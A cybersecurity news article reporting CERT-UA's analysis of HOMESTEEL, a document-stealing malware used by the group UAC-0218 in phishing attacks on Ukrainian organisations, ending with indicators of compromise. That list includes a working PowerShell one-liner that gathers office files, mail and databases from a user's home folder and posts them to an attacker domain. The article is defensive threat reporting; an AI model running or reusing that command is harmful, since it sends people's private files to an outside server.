• About Us
  • Contact Us
  • Editorial Calendar
  • Careers
  • The Cyber Express by Cyble Vulnerability Disclosure Policy
  • Cyble Trust Portal
The Cyber Express
  • MagazineDownload
  • Firewall Daily
    • All
    • Bug Bounty & Rewards
    • Dark Web News
    • Data Breach News
    • Hacker News
    • Ransomware News
    • Vulnerabilities
    weekly roundup TCE The Cyber Express

    The Cyber Express Weekly Roundup: Supply Chain Breaches, AI Content Enforcement, And Event Disruption Attacks

    Active Listening, FTC, FTC Ruling, AI-Powered Marketing, Ai-Powered

    AI-Powered Marketing Service “Active Listening” Deceived Customers: FTC

    Vulnerability Exploitation

    Vulnerability Exploitation Overtakes Stolen Credentials in AI-Driven Cyberattacks

    CVE-2026-41091

    Microsoft Patches Actively Exploited Defender Vulnerabilities Affecting Enterprise Systems

    CVE-2026-20223

    Cisco Secure Workload Flaw CVE-2026-20223 Gets Maximum CVSS 10 Rating

    Financial Services DDoS Attacks

    EMEA Emerges as Global Hotspot for Financial Services DDoS Attacks

    INJ3CTOR3

    INJ3CTOR3 Deploys JOMANGY Webshell in Advanced FreePBX Attacks

    cyber security device

    UK Cybersecurity Innovation SilentGlass Goes Global After Licensing Deal

    MAPO token

    Hackers Exploit Butter Network Bridge to Mint Massive MAPO Supply

    Trending Tags

    • blackbyte ransomware
    • Ransomware
    • lapsus$ ransomware
    • Apple
    • Apple vulnerability
  • Essentials
    • All
    • Compliance
    • Governance
    • Policy Updates
    • Regulations
    First VPN, First VPN seized, VPN Seized, FBI, France, Dutch, Law Enforcement,

    European Agencies Shutter VPN Service Used for Ransomware Attacks

    cyber security device

    UK Cybersecurity Innovation SilentGlass Goes Global After Licensing Deal

    Viral Energy Drink Videos

    Dubai Police Warns Against Viral Energy Drink Videos Targeting Children on Social Media

    Agentic AI Deployment

    NCSC Calls for Tight Security and Human Oversight as Agentic AI Use Expands

    Shadow AI Is Growing in Silence

    Shadow AI Is Growing in Silence While Enterprise Security Falls Behind

    EU Surveillance Technology

    EU Faces Criticism Over Surveillance Technology Exports to Rights Violators

    National Technology Day 2026

    National Technology Day 2026: India’s AI Growth Puts Security in Focus

    California Privacy Settlement

    California Hits General Motors With Record $12.75 Million CCPA Privacy Settlement

    Online Safety Act

    Fake Moustache Trick Raises Questions Over UK Online Safety Act Age Checks

    • Regulations
    • Compliance
    • Governance
    • Policy Updates
  • Knowledge Hub
    • All
    • How to
    • What is
    Google Chrome

    How to Remove Saved Passwords From Google Chrome (And Why You Should)

    DPDP Rules, Cyble, DPDP Act, Cyble Vantage

    How Cyble’s Front-Row Vantage Can Help You in Complying to India’s DPDP Act

    Cybersecurity Countries

    The Top 8 Countries Leading the Cyber Defense Race in 2025

    link building

    The Link Building Secrets Your Competitors Don’t Want You to Know

    Supply Chain Attack

    Supply Chain Resilience and Physical Security: Lessons for 2025

    Healthcare cybersecurity trends of 2024

    Healthcare Cybersecurity: 2024 Was Tough, 2025 May Be Better

    CEO's Guide to Take-Down Services

    Shield Your Organization: CEO’s Perspective on Take-Down Services

    Azure sign-in Microsoft

    Microsoft Announces Mandatory MFA for Azure Sign-ins to Bolster Cloud Defenses

    Signal Proxy, Signal, Signal Ban in Russia, Signal Ban in Venezuela, Bypass Signal Ban, How to Activate Signal Proxy, Signal Proxy Server

    How to Set Up Signal Proxy to Help Bypass Censorship in Russia and Venezuela

  • Features
    • Cyber Warfare
    • Espionage
    • Workforce
      • Learning & Development
  • Business
    • All
    • Appointments
    • Budgets
    • Mergers & Aquisitions
    • Partnerships
    • Press Release
    • Startups
    AI Chip, Chip Security Act

    Congress Wants a GPS Tracker on Every Advanced AI Chip America Exports

    Fraud, Agentic AI

    Agentic AI Run Fraud Campaigns Earning 4.5 Times More: Interpol

    Stryker, Stryker Cyberattack, CISA, Handala

    Stryker Says Cyberattack Disrupted Processing, Manufacturing and Shipping

    INC Ransom, Western Critical Infrastructure, Critical infrastructure, Russian GRU, Russian Threat Actor, Sandworm, APT44, Energy Supply Chain, Energy Infrastructure

    INC Ransom’s Franchise Model Is Putting Critical Infrastructure on the Chopping Block

    Terrorist Cyberattacks, UAE Cyber Security Council

    UAE Blocked AI-Powered Terrorist Cyberattacks Targeting Critical Infrastructure

    Eurail Breach, Eurail

    Eurail Breach Escalates as Stolen Passport Data and IBANs Surface on Dark Web for Sale

    Discord teen-by-default settings

    Discord Introduces Stronger Teen Safety Controls Worldwide

    The Cyber Express cybersecurity roundup

    The Cyber Express Weekly Roundup: FortiOS Exploits, Ransomware, Hacktivist Surge, and EU Telecom Rules

    Nicole Ozer appointment

    Nicole Ozer Joins CPPA to Drive Privacy and Digital Security Initiatives

    • Startups
    • Mergers & Aquisitions
    • Partnerships
    • Appointments
    • Budgets
    • Research
      • Whitepapers
      • Sponsored Content
      • Market Reports
    • Interviews
      • Podcast
  • Events
    • Conference
    • Webinar
    • Endorsed Events
  • Advisory Board
No Result
View All Result
  • MagazineDownload
  • Firewall Daily
    • All
    • Bug Bounty & Rewards
    • Dark Web News
    • Data Breach News
    • Hacker News
    • Ransomware News
    • Vulnerabilities
    weekly roundup TCE The Cyber Express

    The Cyber Express Weekly Roundup: Supply Chain Breaches, AI Content Enforcement, And Event Disruption Attacks

    Active Listening, FTC, FTC Ruling, AI-Powered Marketing, Ai-Powered

    AI-Powered Marketing Service “Active Listening” Deceived Customers: FTC

    Vulnerability Exploitation

    Vulnerability Exploitation Overtakes Stolen Credentials in AI-Driven Cyberattacks

    CVE-2026-41091

    Microsoft Patches Actively Exploited Defender Vulnerabilities Affecting Enterprise Systems

    CVE-2026-20223

    Cisco Secure Workload Flaw CVE-2026-20223 Gets Maximum CVSS 10 Rating

    Financial Services DDoS Attacks

    EMEA Emerges as Global Hotspot for Financial Services DDoS Attacks

    INJ3CTOR3

    INJ3CTOR3 Deploys JOMANGY Webshell in Advanced FreePBX Attacks

    cyber security device

    UK Cybersecurity Innovation SilentGlass Goes Global After Licensing Deal

    MAPO token

    Hackers Exploit Butter Network Bridge to Mint Massive MAPO Supply

    Trending Tags

    • blackbyte ransomware
    • Ransomware
    • lapsus$ ransomware
    • Apple
    • Apple vulnerability
  • Essentials
    • All
    • Compliance
    • Governance
    • Policy Updates
    • Regulations
    First VPN, First VPN seized, VPN Seized, FBI, France, Dutch, Law Enforcement,

    European Agencies Shutter VPN Service Used for Ransomware Attacks

    cyber security device

    UK Cybersecurity Innovation SilentGlass Goes Global After Licensing Deal

    Viral Energy Drink Videos

    Dubai Police Warns Against Viral Energy Drink Videos Targeting Children on Social Media

    Agentic AI Deployment

    NCSC Calls for Tight Security and Human Oversight as Agentic AI Use Expands

    Shadow AI Is Growing in Silence

    Shadow AI Is Growing in Silence While Enterprise Security Falls Behind

    EU Surveillance Technology

    EU Faces Criticism Over Surveillance Technology Exports to Rights Violators

    National Technology Day 2026

    National Technology Day 2026: India’s AI Growth Puts Security in Focus

    California Privacy Settlement

    California Hits General Motors With Record $12.75 Million CCPA Privacy Settlement

    Online Safety Act

    Fake Moustache Trick Raises Questions Over UK Online Safety Act Age Checks

    • Regulations
    • Compliance
    • Governance
    • Policy Updates
  • Knowledge Hub
    • All
    • How to
    • What is
    Google Chrome

    How to Remove Saved Passwords From Google Chrome (And Why You Should)

    DPDP Rules, Cyble, DPDP Act, Cyble Vantage

    How Cyble’s Front-Row Vantage Can Help You in Complying to India’s DPDP Act

    Cybersecurity Countries

    The Top 8 Countries Leading the Cyber Defense Race in 2025

    link building

    The Link Building Secrets Your Competitors Don’t Want You to Know

    Supply Chain Attack

    Supply Chain Resilience and Physical Security: Lessons for 2025

    Healthcare cybersecurity trends of 2024

    Healthcare Cybersecurity: 2024 Was Tough, 2025 May Be Better

    CEO's Guide to Take-Down Services

    Shield Your Organization: CEO’s Perspective on Take-Down Services

    Azure sign-in Microsoft

    Microsoft Announces Mandatory MFA for Azure Sign-ins to Bolster Cloud Defenses

    Signal Proxy, Signal, Signal Ban in Russia, Signal Ban in Venezuela, Bypass Signal Ban, How to Activate Signal Proxy, Signal Proxy Server

    How to Set Up Signal Proxy to Help Bypass Censorship in Russia and Venezuela

  • Features
    • Cyber Warfare
    • Espionage
    • Workforce
      • Learning & Development
  • Business
    • All
    • Appointments
    • Budgets
    • Mergers & Aquisitions
    • Partnerships
    • Press Release
    • Startups
    AI Chip, Chip Security Act

    Congress Wants a GPS Tracker on Every Advanced AI Chip America Exports

    Fraud, Agentic AI

    Agentic AI Run Fraud Campaigns Earning 4.5 Times More: Interpol

    Stryker, Stryker Cyberattack, CISA, Handala

    Stryker Says Cyberattack Disrupted Processing, Manufacturing and Shipping

    INC Ransom, Western Critical Infrastructure, Critical infrastructure, Russian GRU, Russian Threat Actor, Sandworm, APT44, Energy Supply Chain, Energy Infrastructure

    INC Ransom’s Franchise Model Is Putting Critical Infrastructure on the Chopping Block

    Terrorist Cyberattacks, UAE Cyber Security Council

    UAE Blocked AI-Powered Terrorist Cyberattacks Targeting Critical Infrastructure

    Eurail Breach, Eurail

    Eurail Breach Escalates as Stolen Passport Data and IBANs Surface on Dark Web for Sale

    Discord teen-by-default settings

    Discord Introduces Stronger Teen Safety Controls Worldwide

    The Cyber Express cybersecurity roundup

    The Cyber Express Weekly Roundup: FortiOS Exploits, Ransomware, Hacktivist Surge, and EU Telecom Rules

    Nicole Ozer appointment

    Nicole Ozer Joins CPPA to Drive Privacy and Digital Security Initiatives

    • Startups
    • Mergers & Aquisitions
    • Partnerships
    • Appointments
    • Budgets
    • Research
      • Whitepapers
      • Sponsored Content
      • Market Reports
    • Interviews
      • Podcast
  • Events
    • Conference
    • Webinar
    • Endorsed Events
  • Advisory Board
No Result
View All Result
The Cyber Express
No Result
View All Result
Home Malware News

HOMESTEEL Malware Emerges as the Latest Cyberthreat to Ukraine’s Data Assets

Mihir Bagwe by Mihir Bagwe
October 28, 2024
in Malware News, Cyber News, Firewall Daily
0
HOMESTEEL, Homesteel Malware, Ukraine, CERT-UA, New Malware Variant
1.2k
SHARES
6.5k
VIEWS
Share on LinkedInShare on Twitter

A recent cyber campaign by the threat actor tracked as UAC-0218 has introduced a new malware variant called HOMESTEEL that targets critical Ukrainian data repositories. This latest offensive, flagged by Ukraine’s Computer Emergency Response Team (CERT-UA), reflects the modus operandi of Ukraine’s adversaries who aim to steal sensitive information from government and business networks.

CERT-UA identified the phishing methods, which include emails baiting recipients through familiar subject lines like “account” and “details” and linking to a seemingly legitimate “eDisk” platform.

The eDisk link directs users to download RAR files that house malicious content, embedding two password-protected files labeled as “Contract20102024.doc” and “Invoice20102024.xlsx.” A concealed Visual Basic Script (VBS) file, “Password.vbe,” ultimately initiates HOMESTEEL’s data-siphoning operations.

The primary target files, such as those ending in “xls,” “xlsx,” “doc,” and “pdf,” are systematically collected from user directories up to five subfolders deep. HOMESTEEL’s code commands a recursive search, transmitting files under 10MB to an external server through an HTTP PUT request. This approach minimizes data size to evade potential detection while maximizing data collection.

HOMESTEEL’s Proxy Use Elevates Attack Complexity

UAC-0218’s techniques appear particularly well-tailored to the environment. HOMESTEEL can adapt to proxy settings on compromised systems, further camouflaging its network traffic.

CERT-UA reported that each outgoing request to the attacker’s server contains the full path of the extracted file, which may assist attackers in cataloging sensitive files across compromised systems. This level of customization suggests a level of surveillance intelligence typically seen in more complex, persistent attacks.

report-ad-banner

A notable aspect of the HOMESTEEL malware lies in its reliance on PowerShell, a command-line shell in Windows environments widely exploited in cyber operations.

CERT-UA researchers found an additional executable acting as a self-extracting archive with embedded PowerShell commands. These commands initiate further file reconnaissance, scanning user directories for extensions like xls*, doc*, pdf and eml, and dispatching files to a central server via HTTP POST requests.

This double-methodology showcases HOMESTEEL’s resilience, as it attempts to bypass any security hurdles the initial infection vector encounters.

Infrastructure Tactics Link Campaign to August Origins

The CERT-UA findings link UAC-0218’s activities back to August 2024, based on the domain registration data of its command infrastructure. Ukrainian cyber defenders on Wednesday revealed another campaign that began in August with a similar intent but no links between the two could be established as the threat actor in that case is tracked as UAC-0215.

The attackers leveraged HostZealot, a domain name registrar, and configured a custom Python-based web server as the central data-receiving platform. The server reveals a distinctive “Python Software Foundation BaseHTTP 0.6” banner, helping analysts attribute this campaign to the same infrastructure used in prior UAC-0218 attacks.

By reusing components across multiple operations, UAC-0218 demonstrates a persistent strategy that leverages existing digital assets to increase efficiency and reduce overhead.

The HOMESTEEL campaign raises pressing concerns for Ukraine’s government, which has long battled cyber aggression. As cyber espionage campaigns against Ukraine continue to evolve, CERT-UA’s proactive monitoring of UAC-0218 indicates a critical awareness of threats that leverage evolving malware tactics and refined phishing methodologies.

Indicators of Compromise as shared by CERT-UA

File Hashes:

10d486a514212bff2ef181010e8bd421 3432fe8487b72860cf60b54169f071e26336c56ff078ff78a13e8e29a02b4424 _№_601.rar

dc7e9ab6374bccf3225d95ed4595a608 1679e968b0672342091b2bef5c379767bc59bf575f7ed8d9c6abbdc10fcafe01 Account20102024.xlsx

16e2255474930bab59d59a62caf35a5b 7dd938f2b0d809a80e9e3bf80f9c9d5b27145962871fdc19772ecda95b948abb Agreement 20102024.doc

7c95cd4b9471c904db3a5afc9179b3bc c95fcee5b3daace259c4f31f699c4fca82da7ebc8ed950caa630ca763b2b3e15 Password.vbe

cd03aa7bc1b1f2b64f0c6856ba312484 f541d5c6338d65afba2245685ac1189b44c90393d7e67b70289e1f28b6da6c52 WEXTRACT.EXE

d7a120fee99b0655a08f330a4542f141 465c8bbf75a1717546450cf88aa53d4e12345ab2c776b99dbef1c147da34966a install.txt

325a5308c225ed14355d5afcd12a059c 4ba64f21fb69f2b10debdcf9f8424d0090c98d4dfb3d0d0f9faac0458ba9ae00 POSTRUNPROGRAM

62febd43f2253710adaeea3a0639d26d b8e6665682f4a0a70dcbd4134441041f290fc8b357503ab122fc09911a8a9629 RUNPROGRAM

Network:

hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 1712-327.rar
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 3881-251.rar
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 612-118.rar
hXXps://edisk.in[.]ua/571df09c9c45758/Invoice No. 692-251.rar
hXXps://edisk.in[.]ua/571df09c9c45758/account No. 1712-327.rar
hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/ №_601.rar
hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/Invoice No. 6492-115.rar
hXXps://edisk.ukrnet.01mirror.com[.]ua/571df09c9c45758/2024-10-10_001.rar
hXXps://staticgl[.]one/
hXXps://winupmirror[.]support/

edisk.ukrnet.01mirror.com[.]ua
ukrnet.01mirror.com[.]ua
01mirror.com.ua 2024-10-10 ukrnames.com swiftydns.com
edisk.in.ua 2024-10-23 ukrnames.com swiftydns.com
winupmirror.support 2024-10-09 namecheap.com swiftydns.com
staticgl.one 2024-08-23 namecheap.com registrar-servers.com

109[.]205.195.233 (C2)
194[.]107.92.234 (X-Originating-IP)
46[.]149.173.221 (X-Originating-IP)
94[.]140.114.32
94[.]140.114.76

Hosts:

HKLM\Software\Microsoft\Windows\CurrentVersion\RunOnce\wextract_cleanup0
powershell.exe "(New-Object -ComObject Wscript.Shell).Popup('Error! OS Not Supported!')"
powershell.exe "[Net.ServicePointManager]::SecurityProtocol='Tls12';foreach($fil in dir $HOME -include('*.xls*','*doc*','*.pdf','*. eml','*.sqlite','*.pst','*.txt') -recurse | %{$_.FullName}){iwr https://staticgl.one/$fil -Method POST -infile $ file}"

Share this:

  • Share on LinkedIn (Opens in new window) LinkedIn
  • Share on Reddit (Opens in new window) Reddit
  • Share on X (Opens in new window) X
  • Share on Facebook (Opens in new window) Facebook
  • More
  • Email a link to a friend (Opens in new window) Email
  • Share on WhatsApp (Opens in new window) WhatsApp

Related

Tags: cyberattacks on UkrainemalwareThe Cyber ExpressThe Cyber Express Newsthreat actorsUkraine
Previous Post

Critical Vulnerabilities Found in Siemens and Schneider Electric Products

Next Post

‘I’m not a Robot’ reCAPTCHA Trojanized by Russian Hackers to Target Local Ukrainian Government

Next Post
reCAPTCHA

'I'm not a Robot' reCAPTCHA Trojanized by Russian Hackers to Target Local Ukrainian Government

Upcoming Webinar

Sectoral Threat Reports

❮ ❯
Cyble-Vision


Follow Us On Google News

Latest Cyber News

weekly roundup TCE The Cyber Express
Firewall Daily

The Cyber Express Weekly Roundup: Supply Chain Breaches, AI Content Enforcement, And Event Disruption Attacks

May 22, 2026
Active Listening, FTC, FTC Ruling, AI-Powered Marketing, Ai-Powered
Cyber News

AI-Powered Marketing Service “Active Listening” Deceived Customers: FTC

May 22, 2026
Vulnerability Exploitation
Cyber News

Vulnerability Exploitation Overtakes Stolen Credentials in AI-Driven Cyberattacks

May 22, 2026
CVE-2026-41091
Firewall Daily

Microsoft Patches Actively Exploited Defender Vulnerabilities Affecting Enterprise Systems

May 22, 2026

Categories

Web Stories

Do This on Telegram, Your Bank Account Will Become Zero
Do This on Telegram, Your Bank Account Will Become Zero
If You Install the iOS 18 Beta, Your iPhone Could Be Hacked
If You Install the iOS 18 Beta, Your iPhone Could Be Hacked
Cricket World Cup Ticketing Systems Under Cybersecurity
Cricket World Cup Ticketing Systems Under Cybersecurity
Cyber Threats and Online Ticket Scams During the NBA Finals
Cyber Threats and Online Ticket Scams During the NBA Finals
Biometric Data Security: Protecting Sensitive Information
Biometric Data Security: Protecting Sensitive Information

About

The Cyber Express

#1 Trending Cybersecurity News and Magazine

The Cyber Express is a handbook for all stakeholders of the internet that provides information security professionals with the latest news, updates and knowledge they need to combat cyber threats.

 

Contact

For editorial queries: [email protected]

For marketing and Sales: [email protected]

 

Quick Links

  • About Us
  • Contact Us
  • Editorial Calendar
  • Careers
  • The Cyber Express by Cyble Vulnerability Disclosure Policy
  • Cyble Trust Portal

Our Address

We’re remote friendly, with office locations around the world:

San Francisco, Atlanta, Rome,
Dubai, Mumbai, Bangalore, Hyderabad,  Singapore, Jakarta, Sydney, and Melbourne

 

Headquarters:

The Cyber Express LLC
10080 North Wolfe Road, Suite SW3-200, Cupertino, CA, US 95014

 

India Office:

Cyber Express Media Network
HD-021, 4th Floor, C Wing, Building No.4. Nesco IT Park, WE Highway, Goregaon East, Mumbai, Maharashtra, India – 4000063

  • Privacy Statement
  • Terms of Use
  • Write For Us

© 2026 The Cyber Express - Cybersecurity News and Magazine.

Welcome Back!

Login to your account below

Forgotten Password?

Retrieve your password

Please enter your username or email address to reset your password.

Log In

Add New Playlist

No Result
View All Result
  • Magazine
  • Firewall Daily
  • Essentials
    • Regulations
    • Compliance
    • Governance
    • Policy Updates
  • Knowledge Hub
  • Features
    • Cyber Warfare
    • Espionage
    • Workforce
      • Learning & Development
  • Business
    • Startups
    • Mergers & Aquisitions
    • Partnerships
    • Appointments
    • Budgets
    • Research
      • Whitepapers
      • Sponsored Content
      • Market Reports
    • Interviews
      • Podcast
  • Events
    • Conference
    • Webinar
    • Endorsed Events
  • Advisory Board

© 2026 The Cyber Express - Cybersecurity News and Magazine.

Are you sure want to unlock this post?
Unlock left : 0
Are you sure want to cancel subscription?
-
00:00
00:00

Queue

Update Required Flash plugin
-
00:00
00:00
Do This on Telegram, Your Bank Account Will Become Zero If You Install the iOS 18 Beta, Your iPhone Could Be Hacked Cricket World Cup Ticketing Systems Under Cybersecurity Cyber Threats and Online Ticket Scams During the NBA Finals Biometric Data Security: Protecting Sensitive Information